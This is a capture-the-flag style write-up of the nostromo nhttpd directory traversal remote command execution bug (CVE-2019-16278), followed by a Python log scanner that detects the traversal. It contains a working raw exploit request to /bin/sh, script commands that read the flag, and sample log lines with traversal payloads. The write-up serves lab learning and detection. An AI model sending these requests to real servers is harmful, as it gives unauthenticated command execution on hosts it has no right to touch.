[Vulfocus range reproduction] Nostromo remote command execution (CVE-2019-16278)


Vulnerability introduction

Nostromo nhttpd is an open source web server. Nostromo does not verify URLs safely, which results in directory traversal: anyone can reach any file on the system. A remote unauthenticated attacker can therefore force the server to point to a shell file such as /bin/sh and execute arbitrary commands.

Affected versions

nhttpd: version <= 1.9.6

Reproduction process

1. Start the range environment

2. Verify the PoC by capturing the request in Burp Suite


POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

ifconfig 2>&1

3. Exploitation with a script

Script address: https://github.com/jas502n/CVE-2019-16278

./CVE-2019-16278.sh <IP address> <port> id

Once the exploit succeeds, other commands can be tested in the same way. I won't spend time on them here and will go straight to the command that retrieves the flag; you can work out the other commands yourself.

Anyone who has used the vulfocus range before knows that the flag is in the /tmp directory, so let's go directly to /tmp to find the flag.

./CVE-2019-16278.sh <IP address> <port> "cd /tmp&&ls"

Successfully obtained flag


Upgrade to the latest version 1.9.7
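
On the detection side, the request from step 2 can be found in access logs by looking for path segments that become `..` only after control characters are removed. The following is an added example, not part of the original write-up or of the nostromo project; the common log format, the sample entries and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

CTRL = re.compile(r"[\x00-\x1f\x7f]")                # CR, LF, TAB, NUL, DEL, ...
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/\d\.\d"')  # request line in a log entry

# Constructed sample entries (common log format assumed, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2020:10:00:03 +0000] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 200 1024',
    '203.0.113.9 - - [01/Jan/2020:10:00:07 +0000] "GET /../../etc/passwd HTTP/1.1" 400 0',
    '198.51.100.2 - - [01/Jan/2020:10:00:09 +0000] "GET /docs/v1..2/notes.txt HTTP/1.1" 200 90',
]

def decode(target, rounds=3):
    """Percent-decode the path repeatedly so double encoding (%250d) is unwrapped too."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        once = unquote(path, encoding="latin-1")
        if once == path:
            break
        path = once
    return path

def classify(target):
    """Return 'traversal', 'obfuscated-traversal' or 'ok' for one request target."""
    path = decode(target)
    if ".." in path.split("/"):
        return "traversal"
    # A '..' segment that appears only once control characters are dropped is
    # the shape of the PoC above: '.%0d.' decodes to '.', CR, '.'.
    if ".." in CTRL.sub("", path).split("/"):
        return "obfuscated-traversal"
    return "ok"

def scan(lines):
    """Return (line number, verdict, raw target) for every suspicious entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match and (verdict := classify(match.group(1))) != "ok":
            hits.append((number, verdict, match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The same `classify` check can be applied to request targets at a reverse proxy or WAF in front of hosts that cannot be upgraded immediately.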

